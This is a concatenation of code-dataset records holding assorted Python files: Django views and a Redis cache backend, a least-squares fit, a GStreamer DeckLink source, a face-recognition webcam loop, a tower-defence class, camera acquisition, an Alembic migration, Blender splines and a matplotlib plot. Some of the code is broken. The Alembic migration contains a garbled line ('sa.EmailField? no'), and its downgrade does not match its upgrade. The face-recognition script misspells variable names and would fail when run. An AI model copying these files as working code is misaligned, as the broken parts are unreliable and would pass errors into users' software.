Must be logged in')\n            return redirect('login')\n\n        course_id = request.POST['course_id']\n\n        course = Course.objects.get(id=course_id)\n        course.is_hidden = True\n        course.save()\n\n        if 'is_detail' in request.POST:\n            return redirect('course_list')\n        else:\n            return HttpResponse('')\n\n\n# Marks all required fields as not required and adds an 'Any' value to the drop down lists\ndef search_form_defaults(form):\n    form.fields['title'].required = False\n","sub_path":"courses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} {"seq_id":"14310046","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import leastsq\nfrom pylab import mpl\n\nmpl.rcParams['font.sans-serif'] = ['Microsoft YaHei']  # set the default font\nmpl.rcParams['axes.unicode_minus'] = False  # keep the minus sign '-' from rendering as a box in saved figures\n\n\n# Error of the line parameterized by p against the original data\ndef f(p):\n    k, b = p\n    return Y - (k * X + b)\n\n\nif __name__ == '__main__':\n    X = np.array([8.19, 2.72, 6.39, 8.71, 4.7, 2.66, 3.78])\n    Y = np.array([7.01, 2.78, 6.47, 6.71, 4.1, 4.23, 4.05])\n    # leastsq minimizes the sum of squares of f's output; initial parameters are [1, 0]\n    r = leastsq(f, [1, 0])  # any reasonable initial guess works\n    k, b = r[0]\n    x = np.linspace(0, 10, 1000)\n    y = k * x + b\n\n    # scatter plot; s is the point size\n    plt.scatter(X, Y, s=100, alpha=1.0, marker='o', label=u'data points')\n    # plot the fitted line; linewidth is the line width\n    plt.plot(x, y, color='r', linewidth=2, linestyle=\"-\", markersize=20, label=u'fitted line')\n    plt.xlabel('Ampere/A')  # (for MCM, don't use Chinese labels)\n    plt.ylabel('Volt/V')\n    plt.legend(loc=0, numpoints=1)  # show the legend for the points and the line\n    # plt.plot(X, Y)\n    plt.show()\n\n    print('k = ', k)\n    print('b = ', b)\n","sub_path":"PythonLearning/MathematicalModeling/数值逼近/最小二乘法.py","file_name":"最小二乘法.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} {"seq_id":"403109883","text":"import logging\nimport re\n\nfrom gi.repository import Gst\n\nfrom lib.config import Config\nfrom lib.sources.avsource import AVSource\n\n\nclass DeckLinkAVSource(AVSource):\n\n    def __init__(self, name, outputs=None, has_audio=True, has_video=True):\n        self.log = logging.getLogger('DecklinkAVSource[{}]'.format(name))\n        super().__init__(name, outputs, has_audio, has_video)\n\n        section = 'source.{}'.format(name)\n\n        # Device number, default: 0\n        self.device = Config.get(section, 'devicenumber', fallback=0)\n\n        # Audio connection, default: Automatic\n        self.aconn = Config.get(section, 'audio_connection', fallback='auto')\n\n        # Video connection, default: Automatic\n        self.vconn = Config.get(section, 'video_connection', fallback='auto')\n\n        # Video mode, default: 1080i50\n        self.vmode = Config.get(section, 'video_mode', fallback='1080i50')\n\n        # Video format, default: auto\n        self.vfmt = Config.get(section, 'video_format', fallback='auto')\n\n        self.audiostream_map = self._parse_audiostream_map(section)\n        self.log.info(\"audiostream_map: %s\", self.audiostream_map)\n\n        self.fallback_default = False\n        if len(self.audiostream_map) == 0:\n            self.log.info(\"no audiostream-mapping defined,\"\n                          \"defaulting to mapping channel 0+1 to first stream\")\n            self.fallback_default = True\n\n        self._warn_incorrect_number_of_streams()\n\n        self.required_input_channels = \\\n            self._calculate_required_input_channels()\n\n        self.log.info(\"configuring decklink-input to %u channels\",\n                      self.required_input_channels)\n\n        min_gst_multi_channels = (1, 12, 3)\n        if self.required_input_channels > 2 and \\\n                Gst.version() < min_gst_multi_channels:\n\n            self.log.warning(\n                
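For a straight-line fit like the one in the record above, `np.polyfit` gives the same slope and intercept without a hand-rolled residual function; a quick cross-check on the same data:

```python
import numpy as np

X = np.array([8.19, 2.72, 6.39, 8.71, 4.7, 2.66, 3.78])
Y = np.array([7.01, 2.78, 6.47, 6.71, 4.1, 4.23, 4.05])
k, b = np.polyfit(X, Y, 1)  # degree-1 least-squares fit
print('k =', k, 'b =', b)   # should match the leastsq result
```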
'GStreamer version %s is probably too old to use more than 2 '\n                'channels on your decklink source. Officially supported '\n                'since %s',\n                tuple(Gst.version()), min_gst_multi_channels)\n\n        self.launch_pipeline()\n\n    def _calculate_required_input_channels(self):\n        required_input_channels = 0\n        for audiostream, mapping in self.audiostream_map.items():\n            left, right = self._parse_audiostream_mapping(mapping)\n            required_input_channels = max(required_input_channels, left + 1)\n            if right:\n                required_input_channels = max(required_input_channels,\n                                              right + 1)\n\n        required_input_channels = \\\n            self._round_decklink_channels(required_input_channels)\n\n        return required_input_channels\n\n    def _round_decklink_channels(self, required_input_channels):\n        if required_input_channels > 16:\n            raise RuntimeError(\n                \"Decklink-Devices support up to 16 Channels,\"\n                \"you requested {}\".format(required_input_channels))\n\n        elif required_input_channels > 8:\n            required_input_channels = 16\n\n        elif required_input_channels > 2:\n            required_input_channels = 8\n\n        else:\n            required_input_channels = 2\n\n        return required_input_channels\n\n    def _parse_audiostream_map(self, config_section):\n        audiostream_map = {}\n\n        if config_section not in Config:\n            return audiostream_map\n\n        for key in Config[config_section]:\n            value = Config.get(config_section, key)\n            m = re.match(r'audiostream\\[(\\d+)\\]', key)\n            if m:\n                audiostream = int(m.group(1))\n                audiostream_map[audiostream] = value\n\n        return audiostream_map\n\n    def _parse_audiostream_mapping(self, mapping):\n        m = re.match(r'(\\d+)\\+(\\d+)', mapping)\n        if m:\n            return (int(m.group(1)), int(m.group(2)),)\n        else:\n            return (int(mapping), None,)\n\n    def _warn_incorrect_number_of_streams(self):\n        num_streams = Config.getint('mix', 'audiostreams')\n        for audiostream, mapping in self.audiostream_map.items():\n            if audiostream >= num_streams:\n                raise RuntimeError(\n                    \"Mapping-Configuration for Stream 0 to {} found,\"\n                    \"but only {} enabled\"\n                    .format(audiostream, num_streams))\n\n    def __str__(self):\n        return 'DecklinkAVSource[{name}] reading card #{device}'.format(\n            name=self.name,\n            device=self.device\n        )\n\n    def launch_pipeline(self):\n        # A video source is required even when we only need audio\n        pipeline = \"\"\"\n            decklinkvideosrc\n                device-number={device}\n                connection={conn}\n                video-format={fmt}\n                mode={mode} !\n        \"\"\".format(\n            device=self.device,\n            conn=self.vconn,\n            mode=self.vmode,\n            fmt=self.vfmt\n        )\n\n        if self.has_video:\n            pipeline += \"\"\"\n                {deinterlacer}\n                videoconvert !\n                videoscale !\n                videorate name=vout\n            \"\"\".format(\n                deinterlacer=self.build_deinterlacer()\n            )\n        else:\n            pipeline += \"\"\"\n                fakesink\n            \"\"\"\n\n        if self.has_audio:\n            pipeline += \"\"\"\n                decklinkaudiosrc\n                    {channels}\n                    device-number={device}\n                    connection={conn}\n                    {output}\n            \"\"\".format(\n                channels=\"channels={}\".format(self.required_input_channels)\n                if self.required_input_channels > 2 else\n                \"\",\n                device=self.device,\n                conn=self.aconn,\n                output=\"name=aout\"\n                if self.fallback_default else\n                \"! deinterleave name=aout\",\n            )\n\n            for audiostream, mapping in self.audiostream_map.items():\n                left, right = self._parse_audiostream_mapping(mapping)\n                if right is not None:\n                    self.log.info(\n                        \"mapping decklink input-channels {left} and {right}\"\n                        \"as left and right to output-stream {audiostream}\"\n                        .format(left=left,\n                                right=right,\n                                audiostream=audiostream))\n\n                    pipeline += \"\"\"\n                        interleave name=i{audiostream}\n\n                        aout.src_{left} ! queue ! i{audiostream}.sink_0\n                        aout.src_{right} ! queue ! 
i{audiostream}.sink_1\n \"\"\".format(\n left=left,\n right=right,\n audiostream=audiostream\n )\n else:\n self.log.info(\n \"mapping decklink input-channel {channel} \"\n \"as left and right to output-stream {audiostream}\"\n .format(channel=left,\n audiostream=audiostream))\n\n pipeline += \"\"\"\n interleave name=i{audiostream}\n aout.src_{channel} ! tee name=t{audiostream}\n\n t{audiostream}. ! queue ! i{audiostream}.sink_0\n t{audiostream}. ! queue ! i{audiostream}.sink_1\n \"\"\".format(\n channel=left,\n audiostream=audiostream\n )\n\n self.build_pipeline(pipeline)\n self.pipeline.set_state(Gst.State.PLAYING)\n\n def build_deinterlacer(self):\n deinterlacer = super().build_deinterlacer()\n if deinterlacer != '':\n deinterlacer += ' !'\n\n return deinterlacer\n\n def build_audioport(self, audiostream):\n if self.fallback_default and audiostream == 0:\n return \"aout.\"\n\n if audiostream in self.audiostream_map:\n return 'i{}.'.format(audiostream)\n\n def build_videoport(self):\n return 'vout.'\n\n def restart(self):\n self.pipeline.set_state(Gst.State.NULL)\n self.launch_pipeline()\n","sub_path":"voctocore/lib/sources/decklinkavsource.py","file_name":"decklinkavsource.py","file_ext":"py","file_size_in_byte":8283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"286023751","text":"#!/usr/bin/env python\n\nclass Solution:\n # @param {integer} A\n # @param {integer} B\n # @param {integer} C\n # @param {integer} D\n # @param {integer} E\n # @param {integer} F\n # @param {integer} G\n # @param {integer} H\n # @return {integer}\n def computeArea(self, A, B, C, D, E, F, G, H):\n def cal_cover(x0,y0,x1,y1):\n total = y0 - x0 + y1 -x1\n if x1 >= x0:\n total = total - x1 + x0\n else:\n total = total - x0 + x1\n if y1 >= y0:\n total = total - y1 + y0\n else:\n total = total - y0 + y1\n if total > 0:\n total /= 2\n else:\n # these two rectangles do not overlap\n total = 0\n return total\n w = cal_cover(A, C, E, G)\n h = cal_cover(F, H, B, D)\n all = (C-A) * (D-B) + (G-E) * (H-F)\n return all - w * h\n\ndef test():\n s = Solution()\n assert 45 == s.computeArea(-3, 0, 3, 4, 0, -1, 9, 2)\n assert 17 == s.computeArea(-2, -2, 2, 2, 3, 3, 4, 4)\n assert 4 == s.computeArea(0, 0, 0, 0, -1, -1, 1, 1)\n print('Test Passed!')\n\nif __name__ == '__main__':\n test()\n","sub_path":"solutions/rectangle_area.py","file_name":"rectangle_area.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"200989464","text":"import dlib\nimport face_recognition \nimport os\nimport cv2\n\n\nknownFacesDir = 'known_faces'\n#unknownFacesDir = 'unknown_faces'\ntolerance = 0.5\nframeThickness = 3\nfontThinkness = 2\nmodel = 'hog'#hog\n\nvideo = cv2.VideoCapture(0)\n\n\nprint(\"Loading Known Faces\")\n\nknownFaces = []\nknownNames = []\n\nfor name in os.listdir(knownFacesDir):\n\tfor fileName in os.listdir(f\"{knownFacesDir}/{name}\"):\n\t\timage = face_recognition.load_image_file(f\"{knownFacesDir}/{name}/{fileName}\")\n\t\tencoding = face_recognition.face_encodings(image)[0]\n\t\tknownFaces.append(encoding)\n\t\tknownNames.append(name)\n\nprint(\"Processing Unknown faces...\")\n\nwhile True:\n\t#print(filename)\n\t#image = face_recognition.load_image_file(f\"{unknownFacesDir}/{filename}\")\n\tret, image = video.read()\n\n\tloactions = face_recognition.face_locations(image, model = model)\n\tencodings = face_recognition.face_encodings(image, loactions)\n\t#image = 
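The two regexes in `_parse_audiostream_map` and `_parse_audiostream_mapping` above accept config keys like `audiostream[0]` mapped to either a `left+right` channel pair or a single channel used for both sides. A standalone rendition of that parsing (the config dict is illustrative):

```python
import re

def parse_mapping(mapping):
    # "3+4" -> (3, 4); "2" -> (2, None), i.e. one channel for both sides
    m = re.match(r'(\d+)\+(\d+)', mapping)
    return (int(m.group(1)), int(m.group(2))) if m else (int(mapping), None)

config = {'audiostream[0]': '0+1', 'audiostream[1]': '2'}
for key, value in config.items():
    m = re.match(r'audiostream\[(\d+)\]', key)
    if m:
        print(int(m.group(1)), parse_mapping(value))
# 0 (0, 1)
# 1 (2, None)
```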
cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n\n\tfor face_encodings, face_locations in zip(encodings, locations):\n\t\tresults = face_recognition.compare_faces(knownFaces, face_encodings, tolerance)\n\t\tmatch = None\n\t\tif True in results:\n\t\t\tmatch = knownNames[results.index(True)]\n\t\t\tprint(f\"Match Found: {match}\")\n\t\t\ttop_left = (face_locations[3], face_locations[0])\n\t\t\tbtm_right = (face_locations[1], face_locations[2])\n\t\t\tcolor = [255, 0, 0]\n\t\t\tcv2.rectangle(image, top_left, btm_right, color, frameThickness)\n\n\t\t\ttop_left = (face_locations[3], face_locations[2])\n\t\t\tbtm_right = (face_locations[1], face_locations[2]+22)\n\t\t\tcv2.rectangle(image, top_left, btm_right, color, cv2.FILLED)\n\t\t\tcv2.putText(image, match, (face_locations[3]+10, face_locations[2]+15),\n\t\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), fontThickness)\n\tcv2.imshow('Video', image)\n\tif cv2.waitKey(1) & 0xff == ord('q'):\n\t\tbreak\n\n\t#cv2.waitKey(0)\n\t#cv2.destroyWindow('Video')\n\n\n\n","sub_path":"recFaceVideo.py","file_name":"recFaceVideo.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"329864087","text":"from Square import Square\nfrom Numemy import Numemy\nimport math\n\n\ndef tower_cost(value, operation):\n # Cost grows with the tower's value, weighted by how strong the operation is.\n if operation in ['+', '-']:\n factor = 1\n elif operation == '*':\n factor = 1.5\n else:\n factor = 2\n cost = max((factor * value) // 2, 1)\n return cost\n\nclass Tower(Square):\n # 'range' is the radius of the circle the Tower attacks within;\n # 'speed' is how often it attacks;\n # 'cost' is removed from player's wealth;\n # 'level' is 1, 2 or 3 and increases range and speed.\n def __init__(self, surface, value, operation, location):\n Square.__init__(self, surface)\n self.range = 3\n self.speed = 1\n self.value = value\n self.operation = operation\n self.location = location\n self.level = 1\n self.cost = tower_cost(value, operation)\n self.upgrade_cost = max(self.level * self.cost // 3, 1)\n\n def calculate_dist(self, numemyPos, towerPos):\n \"\"\"Returns the Euclidean distance between a Numemy and a Tower\"\"\"\n dist = math.sqrt((towerPos[0] - numemyPos[0])**2 + (towerPos[1] - numemyPos[1])**2)\n return abs(dist)\n\n def attack(self, grid, numemy):\n \"\"\"Damages a Numemy, and kills it if health is 0\"\"\"\n numemy.take_damage(self.operation, self.value)\n if numemy.value == 0:\n grid.square_grid[numemy.location[0]][numemy.location[1]].remove(numemy)\n grid.souls += numemy.souls\n\n def find_targets(self, grid):\n \"\"\"Returns a Numemy within range, if one exists\"\"\"\n for num_loc in grid.num_loc_list:\n square = grid.square_grid[num_loc[0]][num_loc[1]]\n for entity in square:\n if isinstance(entity, Numemy):\n dist = self.calculate_dist(entity.location, self.location)\n if dist <= self.range:\n return entity\n return None\n\n def upgrade(self, grid):\n \"\"\"Increases the level of a Tower as well as associated attributes\"\"\"\n grid.souls -= self.upgrade_cost\n self.level += 1\n self.range *= 1.5\n self.speed *= 1.5\n self.upgrade_cost = max(self.level * self.cost // 3, 1)\n","sub_path":"src/Tower.py","file_name":"Tower.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"92571352","text":"import warnings\nfrom django.core.cache.backends.base import BaseCache, InvalidCacheBackendError\nfrom django.utils.encoding import smart_unicode, smart_str\nfrom django.utils.datastructures import SortedDict
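\n\n# Use the C-accelerated cPickle on Python 2 when it is available, falling\n# back to the pure-Python pickle module otherwise.\ntry:\n import cPickle as 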
pickle\nexcept ImportError:\n import pickle\n\ntry:\n import redis\nexcept ImportError:\n raise InvalidCacheBackendError(\n \"Redis cache backend requires the 'redis-py' library\")\n\n\nclass CacheClass(BaseCache):\n def __init__(self, server, params):\n \"\"\"\n Connect to Redis and set up the cache backend.\n \n Additional params:\n \n key: ``db``\n type: ``int``\n default: ``1``\n description: ``Specifies redis db number to use``\n \n key: ``fail_silently``\n type: ``int``\n default: ``0``\n description: ``When non-zero integer, swallows exceptions, emitting them as warnings instead. Allows cache\n server to go down without killing the site``\n \n \"\"\"\n BaseCache.__init__(self, params)\n \n db = params.get('db', 1)\n try:\n db = int(db)\n except (ValueError, TypeError):\n db = 1\n \n fail_silently = params.get('fail_silently', 0)\n try:\n self.fail_silently = bool(int(fail_silently))\n except (ValueError, TypeError):\n self.fail_silently = False\n \n password = params.get('password', None)\n if ':' in server:\n host, port = server.split(':')\n try:\n port = int(port)\n except (ValueError, TypeError):\n port = 6379\n else:\n host = 'localhost'\n port = 6379\n\n try:\n self._cache = redis.Redis(host=host, port=port, db=db, password=password)\n except Exception as err:\n self.warn_or_error(err)\n \n def warn_or_error(self, exception, default_return_value=None):\n \"\"\"\n Emits a warning and returns a default value, or re-raises an Exception depending on cache configuration options.\n \"\"\"\n if not self.fail_silently:\n raise exception\n\n warnings.warn(str(exception), RuntimeWarning)\n return default_return_value\n \n\n def prepare_key(self, key):\n \"\"\"\n Returns the utf-8 encoded bytestring of the given key.\n \"\"\"\n return smart_str(key)\n\n def add(self, key, value, timeout=None):\n \"\"\"\n Add a value to the cache, failing if the key already exists.\n\n Returns ``True`` if the object was added, ``False`` if not.\n \"\"\"\n try:\n key = self.prepare_key(key)\n if self._cache.exists(key):\n return False\n return self.set(key, value, timeout)\n except Exception as err:\n return self.warn_or_error(err, False)\n\n def get(self, key, default=None):\n \"\"\"\n Retrieve a value from the cache.\n\n Returns the unpickled value if the key is found, ``None`` if not.\n \"\"\"\n try:\n # get the value from the cache\n value = self._cache.get(self.prepare_key(key))\n if value is None:\n return default\n # pickle doesn't want a unicode!\n value = smart_str(value)\n # hydrate that pickle\n return pickle.loads(value)\n except Exception as err:\n return self.warn_or_error(err)\n\n def set(self, key, value, timeout=None):\n \"\"\"\n Persist a value to the cache, and set an optional expiration time.\n \"\"\"\n try:\n key = self.prepare_key(key)\n # store the pickled value\n result = self._cache.set(key, pickle.dumps(value))\n # set expiration if needed\n self.expire(key, timeout)\n # result is a boolean\n return result\n except Exception as err:\n return self.warn_or_error(err, False)\n\n def expire(self, key, timeout=None):\n \"\"\"\n Set content expiration, if necessary\n \"\"\"\n try:\n if timeout == 0:\n # force the key to be non-volatile\n result = self._cache.get(key)\n self._cache.set(key, result)\n else:\n timeout = timeout or self.default_timeout\n # If the expiration command returns false, we need to reset the key\n # with the new expiration\n if not self._cache.expire(key, timeout):\n value = self.get(key)\n self.set(key, value, timeout)\n except Exception as err:\n return 
self.warn_or_error(err)\n\n def delete(self, key):\n \"\"\"\n Remove a key from the cache.\n \"\"\"\n try:\n self._cache.delete(self.prepare_key(key))\n except Exception as err:\n return self.warn_or_error(err)\n\n def delete_many(self, keys):\n \"\"\"\n Remove multiple keys at once.\n \"\"\"\n try:\n if keys:\n self._cache.delete(*map(self.prepare_key, keys))\n except Exception as err:\n return self.warn_or_error(err)\n\n def clear(self):\n \"\"\"\n Flush all cache keys.\n \"\"\"\n try:\n self._cache.flushdb()\n except Exception as err:\n return self.warn_or_error(err)\n\n def get_many(self, keys):\n \"\"\"\n Retrieve many keys.\n \"\"\"\n try:\n recovered_data = SortedDict()\n results = self._cache.mget(map(lambda k: self.prepare_key(k), keys))\n for key, value in zip(keys, results):\n if value is None:\n continue\n # pickle doesn't want a unicode!\n value = smart_str(value)\n # hydrate that pickle\n value = pickle.loads(value)\n if isinstance(value, basestring):\n value = smart_unicode(value)\n recovered_data[key] = value\n return recovered_data\n except Exception as err:\n return self.warn_or_error(err, recovered_data)\n\n def set_many(self, data, timeout=None):\n \"\"\"\n Set a bunch of values in the cache at once from a dict of key/value\n pairs. This is much more efficient than calling set() multiple times.\n\n If timeout is given, that timeout will be used for the key; otherwise\n the default cache timeout will be used.\n \"\"\"\n try:\n safe_data = {}\n for key, value in data.iteritems():\n safe_data[self.prepare_key(key)] = pickle.dumps(value)\n if safe_data:\n self._cache.mset(safe_data)\n map(self.expire, safe_data, [timeout]*len(safe_data))\n except Exception as err:\n return self.warn_or_error(err)\n\n def incr(self, key, delta=1):\n \"\"\"\n Does not use the atomic redis incr or incrby as there seems to be a problem with retrieving the correct value back from the server. Uses\n the regular Django get then set.\n \"\"\"\n try:\n key = self.prepare_key(key)\n return super(CacheClass, self).incr(key, delta)\n except Exception as err:\n return self.warn_or_error(err, delta)\n\n def decr(self, key, delta=1):\n \"\"\"\n Does not use the atomic redis decr or decrby as there seems to be a problem with retrieving the correct value back from the server. 
Uses\n the regular Django get then set.\n \"\"\"\n try:\n key = self.prepare_key(key)\n return super(CacheClass, self).decr(key, delta)\n except Exception as err:\n return self.warn_or_error(err, delta)\n \n def close(self, **kwargs):\n \"\"\"\n Disconnect from the cache.\n \"\"\"\n try:\n self._cache.connection.disconnect()\n except Exception as err:\n return self.warn_or_error(err)\n","sub_path":"redis_cache/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":8171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"576599924","text":"from pathlib import Path\nimport time\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nimport png\n\nfrom pymba import *\nfrom pymba.vimbaexception import VimbaException\nfrom pymba.vimbainterface import VimbaInterface\nfrom pymanip import Session\n\n# Acquisition parameters\ndestination_dir = Path(r'C:\\Users\\Julien Salort\\Documents\\Acquis')\nacquisition_name = 'essai'\nimages_dir = destination_dir / acquisition_name\nN = 20\n\nif not destination_dir.exists():\n destination_dir.mkdir()\nif not destination_dir.is_dir():\n raise NotADirectoryError\nif not images_dir.exists():\n images_dir.mkdir()\nif not images_dir.is_dir():\n raise NotADirectoryError\n\nMI = Session(images_dir, ('timestamp',))\n\ndef print_features(cam):\n cameraFeatureNames = cam.getFeatureNames()\n for name in cameraFeatureNames:\n try:\n val = cam.__getattr__(name)\n if isinstance(val, bytes):\n val = val.decode('ascii')\n info = cam.getFeatureInfo(name)\n unit = info.unit\n if isinstance(unit, bytes):\n unit = unit.decode('ascii')\n elif unit is None:\n unit = \"\"\n print(info.displayName.decode('ascii'),\n '(' + name.decode('ascii') + ')',\n ':', val, unit)\n except VimbaException:\n print(name.decode('ascii'), ': ?')\n \nwith Vimba() as vimba:\n print(\"Vimba version:\", vimba.getVersion())\n system = vimba.getSystem()\n print(\"\"\"\nVimba System features\n=====================\"\"\")\n print_features(system)\n \n # list available cameras (after enabling discovery for GigE cameras)\n if system.GeVTLIsPresent:\n system.runFeatureCommand(\"GeVDiscoveryAllOnce\")\n time.sleep(0.2)\n \n # Open the camera\n cameraIds = vimba.getCameraIds()\n \n for cameraId in cameraIds:\n #print('Camera ID:', cameraId)\n cam = vimba.getCamera(cameraId)\n cam.openCamera()\n #print('Camera ID String', cam.cameraIdString)\n \n \n # Acquisition\n\n print(\"\"\"\nCamera info structure\n=====================\"\"\")\n info = cam.getInfo()\n print('cameraName:', info.cameraName.decode('ascii'))\n print('interfaceIdString:', info.interfaceIdString.decode('ascii'))\n print('modelName:', info.modelName.decode('ascii'))\n print('serialString:', info.serialString.decode('ascii'))\n \n #print('Acquisition mode:', cam.AcquisitionMode)\n # Possible values: 'Continuous', 'SingleFrame', 'MultiFrame', 'Recorder'\n #cam.IIDCActivateFormat7 = True\n cam.AcquisitionMode = 'Continuous'\n cam.IIDCPhyspeed = 'S800'\n cam.PixelFormat = 'Mono16'\n \n #cam.AcquisitionFrameRate = 20.0\n cam.TriggerMode = 'On'\n \n #cam.IIDCPacketSizeAuto = 'On'\n \n print(\"\"\"\nVimba Camera features\n=====================\"\"\")\n print_features(cam)\n \n frame = cam.getFrame()\n frame.announceFrame()\n\n print(\"\"\"\nAcquisition\n===========\"\"\")\n cam.startCapture()\n cam.runFeatureCommand('AcquisitionStart')\n\n for i in range(N):\n frame.queueFrameCapture()\n frame.waitFrameCapture()
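\n # frame.timestamp is assumed to tick at 10 MHz here, so dividing by\n # 1e7 converts it to seconds.\n timestamp = frame.timestamp/1e7\n img = 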
png.from_array(frame.getImage(), mode='L')\n with open(images_dir / 'img-{:03d}.png'.format(i), 'wb') as f:\n img.save(f)\n MI.log_addline()\n \n cam.runFeatureCommand('AcquisitionStop')\n cam.endCapture()\n cam.revokeAllFrames()\n\nprint('Finished.')\n\n# Plot the timestamps\nt = MI['timestamp'][-N:]\ntMI = MI['t'][-N:]\nMI.Stop()\nreal_fs = 1/np.mean(t[1:]-t[:-1])\nprint('Real fs =', real_fs, 'Hz')\nprint('Computer estimated=', 1/np.mean(tMI[1:]-tMI[:-1]))\n\nplt.figure()\nplt.plot(t-t[0], 'bo')\nplt.show()\nMI.Stop()\n","sub_path":"samples/pymba_acquisition_continuous.py","file_name":"pymba_acquisition_continuous.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"388131197","text":"\"\"\"New user model\n\nRevision ID: ca77a3430b2\nRevises: 69423a89666\nCreate Date: 2014-10-24 15:46:16.070648\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'ca77a3430b2'\ndown_revision = '69423a89666'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('email', sa.EmailField? no\n )\n ### end Alembic commands ###\n
###\n op.drop_column(u'board', 'public_can_write')\n op.drop_column(u'board', 'public_can_read')\n op.drop_table('read_permissions')\n op.drop_table('write_permissions')\n op.drop_table('ownership_permissions')\n op.drop_table('user')\n ### end Alembic commands ###\n","sub_path":"jia/jia/migrations/versions/ca77a3430b2_.py","file_name":"ca77a3430b2_.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"591112339","text":"from mathutils import Vector\n\ndef setSplinesOnBlenderObject(object, splines):\n if object is None: return\n if object.type != \"CURVE\": return\n \n bSplines = object.data.splines\n bSplines.clear()\n for spline in splines:\n if spline.type == \"BEZIER\":\n appendBezierSpline(bSplines, spline)\n if spline.type == \"POLY\":\n appendPolySpline(bSplines, spline)\n \n \ndef appendBezierSpline(bSplines, spline):\n bSpline = bSplines.new(\"BEZIER\")\n bSpline.use_cyclic_u = spline.isCyclic\n \n # one point is already there\n bSpline.bezier_points.add(len(spline.points) - 1)\n \n for i, point in enumerate(spline.points):\n bPoint = bSpline.bezier_points[i]\n bPoint.co = point.location\n bPoint.handle_left = point.leftHandle\n bPoint.handle_right = point.rightHandle\n \n \ndef appendPolySpline(bSplines, spline):\n bSpline = bSplines.new(\"POLY\")\n bSpline.use_cyclic_u = spline.isCyclic\n \n # one point is already there\n bSpline.points.add(len(spline.points) - 1)\n \n for i, point in enumerate(spline.points):\n bSpline.points[i].co = Vector((list(point) + [0]))","sub_path":"data_structures/splines/to_blender.py","file_name":"to_blender.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"283113833","text":"from matplotlib import pyplot as plt\r\nfrom matplotlib.font_manager import FontProperties\r\n\r\n\r\n\"\"\"\r\n Chart requirement: a scatter plot of the temperature distribution from March to October\r\n\"\"\"\r\n\r\n# data\r\ny_3 = [11,17,16,11,12,11,12,6,6,7,8,9,12,15,14,17,18,21,16,17,20,14,15,15,15,19,21,22,22,22,23]\r\ny_10 = [26,26,28,19,21,17,16,19,18,20, 20,19,22,23,17,20,21,20,22,15,11,15,5,13,17,10,11,13,12,13,6]\r\n\r\nx_3 = range(1, 32)\r\nx_10 = range(41, 72)\r\n_yticks = range(0, 35)\r\n\r\n# Figure settings\r\nplt.figure(figsize=(15, 6), dpi=80)\r\nmyfont = FontProperties(fname=r\"C:\\WINDOWS\\FONTS\\MSYH.TTC\")\r\n\r\n# x/y axis ticks\r\nx = list(x_3)+list(x_10)\r\n_xticks = [\"3月{}日\".format(x) for x in x_3]\r\n_xticks += [\"10月{}日\".format(x-40) for x in x_10]\r\nplt.xticks(x[::3], _xticks[::3], fontproperties=myfont, rotation=45)\r\nplt.yticks(_yticks[::2])\r\n\r\n# Grid\r\nplt.grid(alpha=0.4)\r\n\r\n# Title\r\nplt.title(\"3月份~10月份 气温的分布散点图\", fontproperties=myfont)\r\nplt.xlabel(\"月份\", fontproperties=myfont)\r\nplt.ylabel(\"温度(℃)\", fontproperties=myfont)\r\n\r\n\r\n# Scatter plot\r\nplt.scatter(x_3, y_3, label=\"3月份\")\r\nplt.scatter(x_10, y_10, label=\"10月份\")\r\n\r\n# Legend\r\nplt.legend(prop=myfont)\r\n\r\nplt.show()\r\n\r\n","sub_path":"Analyse/demo/03_demo/scatter_plot.py","file_name":"scatter_plot.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"34189578","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\nfrom sklearn.neighbors import KNeighborsClassifier, RadiusNeighborsClassifier, KNeighborsRegressor, 
